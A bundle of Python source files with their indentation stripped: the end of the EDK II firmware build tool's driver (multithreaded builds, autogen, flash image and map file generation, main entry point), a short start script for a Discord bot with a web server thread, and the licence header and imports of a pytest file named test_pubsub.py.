Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self,ArchList):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
def VerifyAutoGenFiles(self):
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
try:
with open(AutoGenIdFile) as fd:
lines = fd.readlines()
except:
return None
for line in lines:
if "Arch" in line:
ArchList = line.strip().split("=")[1].split("|")
if "BuildDir" in line:
BuildDir = line.split("=")[1].strip()
if "PlatformGuid" in line:
PlatformGuid = line.split("=")[1].strip()
GlobalVarList = []
for arch in ArchList:
global_var = os.path.join(BuildDir, "GlobalVar_%s_%s.bin" % (str(PlatformGuid),arch))
if not os.path.exists(global_var):
return None
GlobalVarList.append(global_var)
for global_var in GlobalVarList:
data_pipe = MemoryDataPipe()
data_pipe.load(global_var)
target = data_pipe.Get("P_Info").get("Target")
toolchain = data_pipe.Get("P_Info").get("ToolChain")
archlist = data_pipe.Get("P_Info").get("ArchList")
Arch = data_pipe.Get("P_Info").get("Arch")
active_p = data_pipe.Get("P_Info").get("ActivePlatform")
workspacedir = data_pipe.Get("P_Info").get("WorkspaceDir")
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(workspacedir, PackagesPath)
LibraryBuildDirectoryList = data_pipe.Get("LibraryBuildDirectoryList")
ModuleBuildDirectoryList = data_pipe.Get("ModuleBuildDirectoryList")
for m_build_dir in LibraryBuildDirectoryList:
if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
return None
for m_build_dir in ModuleBuildDirectoryList:
if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
return None
Wa = WorkSpaceInfo(
workspacedir,active_p,target,toolchain,archlist
)
Pa = PlatformInfo(Wa, active_p, target, toolchain, Arch,data_pipe)
Wa.AutoGenObjectList.append(Pa)
return Wa
def SetupMakeSetting(self,Wa):
BuildModules = []
for Pa in Wa.AutoGenObjectList:
for m in Pa._MbList:
ma = ModuleAutoGen(Wa,m.MetaFile, Pa.BuildTarget, Wa.ToolChain, Pa.Arch, Pa.MetaFile,Pa.DataPipe)
BuildModules.append(ma)
fdf_file = Wa.FlashDefinition
if fdf_file:
Fdf = FdfParser(fdf_file.Path)
Fdf.ParseFile()
GlobalData.gFdfParser = Fdf
if Fdf.CurrentFdName and Fdf.CurrentFdName in Fdf.Profile.FdDict:
FdDict = Fdf.Profile.FdDict[Fdf.CurrentFdName]
for FdRegion in FdDict.RegionList:
if str(FdRegion.RegionType) == 'FILE' and self.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
if int(FdRegion.Offset) % 8 != 0:
EdkLogger.error("build", FORMAT_INVALID, 'The VPD Base Address %s must be 8-byte aligned.' % (FdRegion.Offset))
Wa.FdfProfile = Fdf.Profile
self.Fdf = Fdf
else:
self.Fdf = None
return BuildModules
## Build a platform in multi-thread mode
#
def PerformAutoGen(self,BuildTarget,ToolChain):
WorkspaceAutoGenTime = time.time()
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
BuildModules = []
for Arch in Wa.ArchList:
PcdMaList = []
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
Pa.DataPipe.DataContainer = {"CommandTarget": self.Target}
Pa.CreateLibModuelDirs()
# Fetch the MakeFileName.
self.MakeFileName = Pa.MakeFileName
if not self.MakeFileName:
self.MakeFileName = Pa.MakeFile
Pa.DataPipe.DataContainer = {"LibraryBuildDirectoryList":Pa.LibraryBuildDirectoryList}
Pa.DataPipe.DataContainer = {"ModuleBuildDirectoryList":Pa.ModuleBuildDirectoryList}
Pa.DataPipe.DataContainer = {"FdsCommandDict": Wa.GenFdsCommandDict}
# Prepare the cache share data for multiprocessing
Pa.DataPipe.DataContainer = {"gPlatformHashFile":GlobalData.gPlatformHashFile}
ModuleCodaFile = {}
for ma in Pa.ModuleAutoGenList:
ModuleCodaFile[(ma.MetaFile.File,ma.MetaFile.Root,ma.Arch,ma.MetaFile.Path)] = [item.Target for item in ma.CodaTargetList]
Pa.DataPipe.DataContainer = {"ModuleCodaFile":ModuleCodaFile}
# ModuleList contains all driver modules only
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
PcdMaList.append(Ma)
self.AllDrivers.add(Ma)
self.AllModules.add(Ma)
mqueue = mp.Queue()
cqueue = mp.Queue()
for m in Pa.GetAllModuleInfo:
mqueue.put(m)
module_file,module_root,module_path,module_basename,\
module_originalpath,module_arch,IsLib = m
Ma = ModuleAutoGen(Wa, PathClass(module_path, Wa), BuildTarget,\
ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
self.AllModules.add(Ma)
data_pipe_file = os.path.join(Pa.BuildDir, "GlobalVar_%s_%s.bin" % (str(Pa.Guid),Pa.Arch))
Pa.DataPipe.dump(data_pipe_file)
mqueue.put((None,None,None,None,None,None,None))
autogen_rt, errorcode = self.StartAutoGen(mqueue, Pa.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
if not autogen_rt:
self.AutoGenMgr.TerminateWorkers()
self.AutoGenMgr.join(1)
raise FatalError(errorcode)
if GlobalData.gUseHashCache:
for item in GlobalData.gModuleAllCacheStatus:
(MetaFilePath, Arch, CacheStr, Status) = item
Ma = ModuleAutoGen(Wa, PathClass(MetaFilePath, Wa), BuildTarget,\
ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if CacheStr == "PreMakeCache" and Status == False:
self.PreMakeCacheMiss.add(Ma)
if CacheStr == "PreMakeCache" and Status == True:
self.PreMakeCacheHit.add(Ma)
GlobalData.gModuleCacheHit.add(Ma)
if CacheStr == "MakeCache" and Status == False:
self.MakeCacheMiss.add(Ma)
if CacheStr == "MakeCache" and Status == True:
self.MakeCacheHit.add(Ma)
GlobalData.gModuleCacheHit.add(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
with open(AutoGenIdFile,"w") as fw:
fw.write("Arch=%s\n" % "|".join((Wa.ArchList)))
fw.write("BuildDir=%s\n" % Wa.BuildDir)
fw.write("PlatformGuid=%s\n" % str(Wa.AutoGenObjectList[0].Guid))
if GlobalData.gBinCacheSource:
BuildModules.extend(self.MakeCacheMiss)
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheDest:
BuildModules.extend(self.PreMakeCacheMiss)
else:
BuildModules.extend(self.AllDrivers)
self.Progress.Stop("done!")
return Wa, BuildModules
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
resetFdsGlobalVariable()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
ExitFlag = threading.Event()
ExitFlag.clear()
if self.SkipAutoGen:
Wa = self.VerifyAutoGenFiles()
if Wa is None:
self.SkipAutoGen = False
Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
else:
GlobalData.gAutoGenPhase = True
self.BuildModules = self.SetupMakeSetting(Wa)
else:
Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
Pa = Wa.AutoGenObjectList[0]
GlobalData.gAutoGenPhase = False
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache Summary]: Total module num: %s" % len(self.AllModules))
EdkLogger.quiet("[cache Summary]: PreMakecache miss num: %s " % len(self.PreMakeCacheMiss))
EdkLogger.quiet("[cache Summary]: Makecache miss num: %s " % len(self.MakeCacheMiss))
for Arch in Wa.ArchList:
MakeStart = time.time()
for Ma in set(self.BuildModules):
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
#
# Get Module List
#
ModuleList = {ma.Guid.upper(): ma for ma in self.BuildModules}
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = []
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
Threshold = self.GetFreeSizeThreshold()
if Threshold:
self.CheckFreeSizeThreshold(Threshold, Wa.FvDir)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
self.CreateGuidedSectionToolsFile(Wa)
## GetFreeSizeThreshold()
#
# @retval int Threshold value
#
def GetFreeSizeThreshold(self):
Threshold = None
Threshold_Str = GlobalData.gCommandLineDefines.get('FV_SPARE_SPACE_THRESHOLD')
if Threshold_Str:
try:
if Threshold_Str.lower().startswith('0x'):
Threshold = int(Threshold_Str, 16)
else:
Threshold = int(Threshold_Str)
except:
EdkLogger.warn("build", 'incorrect value for FV_SPARE_SPACE_THRESHOLD %s.Only decimal or hex format is allowed.' % Threshold_Str)
return Threshold
def CheckFreeSizeThreshold(self, Threshold=None, FvDir=None):
if not isinstance(Threshold, int):
return
if not isinstance(FvDir, str) or not FvDir:
return
FdfParserObject = GlobalData.gFdfParser
FvRegionNameList = [FvName for FvName in FdfParserObject.Profile.FvDict if FdfParserObject.Profile.FvDict[FvName].FvRegionInFD]
for FvName in FdfParserObject.Profile.FvDict:
if FvName in FvRegionNameList:
FvSpaceInfoFileName = os.path.join(FvDir, FvName.upper() + '.Fv.map')
if os.path.exists(FvSpaceInfoFileName):
FileLinesList = getlines(FvSpaceInfoFileName)
for Line in FileLinesList:
NameValue = Line.split('=')
if len(NameValue) == 2 and NameValue[0].strip() == 'EFI_FV_SPACE_SIZE':
FreeSizeValue = int(NameValue[1].strip(), 0)
if FreeSizeValue < Threshold:
EdkLogger.error("build", FV_FREESIZE_ERROR,
'%s FV free space %d is not enough to meet with the required spare space %d set by -D FV_SPARE_SPACE_THRESHOLD option.' % (
FvName, FreeSizeValue, Threshold))
break
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self,Wa):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
guidList = []
tooldefguidList = []
guidAttribs = []
for Platform in Wa.AutoGenObjectList:
if Platform.BuildTarget != BuildTarget:
continue
if Platform.ToolChain != ToolChain:
continue
if Platform.Arch != Arch:
continue
if hasattr (Platform, 'BuildOption'):
for Tool in Platform.BuildOption:
if 'GUID' in Platform.BuildOption[Tool]:
if 'PATH' in Platform.BuildOption[Tool]:
value = Platform.BuildOption[Tool]['GUID']
if value in guidList:
EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in DSC [BuildOptions]." % (value, Tool))
path = Platform.BuildOption[Tool]['PATH']
guidList.append(value)
guidAttribs.append((value, Tool, path))
for Tool in Platform.ToolDefinition:
if 'GUID' in Platform.ToolDefinition[Tool]:
if 'PATH' in Platform.ToolDefinition[Tool]:
value = Platform.ToolDefinition[Tool]['GUID']
if value in tooldefguidList:
EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in tools_def.txt." % (value, Tool))
tooldefguidList.append(value)
if value in guidList:
# Already added by platform
continue
path = Platform.ToolDefinition[Tool]['PATH']
guidList.append(value)
guidAttribs.append((value, Tool, path))
# Sort by GuidTool name
guidAttribs = sorted (guidAttribs, key=lambda x: x[1])
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the real path of the tool.
#
def GetRealPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
return tool
## Launch the module or platform build
#
def Launch(self):
self.AllDrivers = set()
self.AllModules = set()
self.PreMakeCacheMiss = set()
self.PreMakeCacheHit = set()
self.MakeCacheMiss = set()
self.MakeCacheHit = set()
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
def GenDestCache(self):
for Module in self.AllModules:
Module.GenPreMakefileHashList()
Module.GenMakefileHashList()
Module.CopyModuleToCache()
def GenLocalPreMakeCache(self):
for Module in self.PreMakeCacheMiss:
Module.GenPreMakefileHashList()
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
def ThreadNum():
OptionParser = MyOptionParser()
if not OptionParser.BuildOption and not OptionParser.BuildTarget:
OptionParser.GetOption()
BuildOption, BuildTarget = OptionParser.BuildOption, OptionParser.BuildTarget
ThreadNumber = BuildOption.ThreadNumber
GlobalData.gCmdConfDir = BuildOption.ConfDirectory
if ThreadNumber is None:
TargetObj = TargetTxtDict()
ThreadNumber = TargetObj.Target.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if ThreadNumber == '':
ThreadNumber = 0
else:
ThreadNumber = int(ThreadNumber, 0)
if ThreadNumber == 0:
try:
ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
ThreadNumber = 1
return ThreadNumber
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
LogQMaxSize = ThreadNum() * 10
def Main():
StartTime = time.time()
#
# Create a log Queue
#
LogQ = mp.Queue(LogQMaxSize)
# Initialize log system
EdkLogger.LogClientInitialize(LogQ)
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
OptionParser = MyOptionParser()
if not OptionParser.BuildOption and not OptionParser.BuildTarget:
OptionParser.GetOption()
Option, Target = OptionParser.BuildOption, OptionParser.BuildTarget
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
LogLevel = EdkLogger.INFO
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
LogLevel = EdkLogger.VERBOSE
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
LogLevel = EdkLogger.QUIET
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
LogLevel = Option.debug + 1
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
Log_Agent = LogAgent(LogQ,LogLevel,Option.LogFile)
Log_Agent.start()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option,LogQ)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to %s for help, attaching following call stack trace!)\n" % MSG_EDKII_MAIL_ADDR,
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
ReturnCode = POSTBUILD_ERROR
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
Log_Agent.kill()
Log_Agent.join()
return ReturnCode
if __name__ == '__main__':
try:
mp.set_start_method('spawn')
except:
pass
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
start.py
|
import threading
from discord.ext import commands
import discord
from website import create_app
from cogs import generalCommands, events, leaderboard
from settings import configFunctions
global client
client = commands.Bot(command_prefix=commands.when_mentioned_or(configFunctions.getCommandPrefix()), description='Your local BertieBot')
global serverid
def startWebsite():
napp=create_app(client)
napp.run('0.0.0.0', port=configFunctions.getPortNumber())
if __name__=='__main__':
websiteThread = threading.Thread(target=startWebsite)
websiteThread.start()
client.add_cog(generalCommands.GeneralCommands(client))
client.add_cog(events.Events(client))
client.add_cog(leaderboard.Leaderboard(client))
client.run(configFunctions.getBotToken())
|
test_pubsub.py
|
#!/usr/local/bin/python3.6
# vim: expandtab shiftwidth=4
# Copyright (C) 2019 National Institute of Informatics
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import copy
import logging
import os
from pathlib import Path
from queue import Queue
from tempfile import TemporaryDirectory
from threading import Thread, Event
import pytest
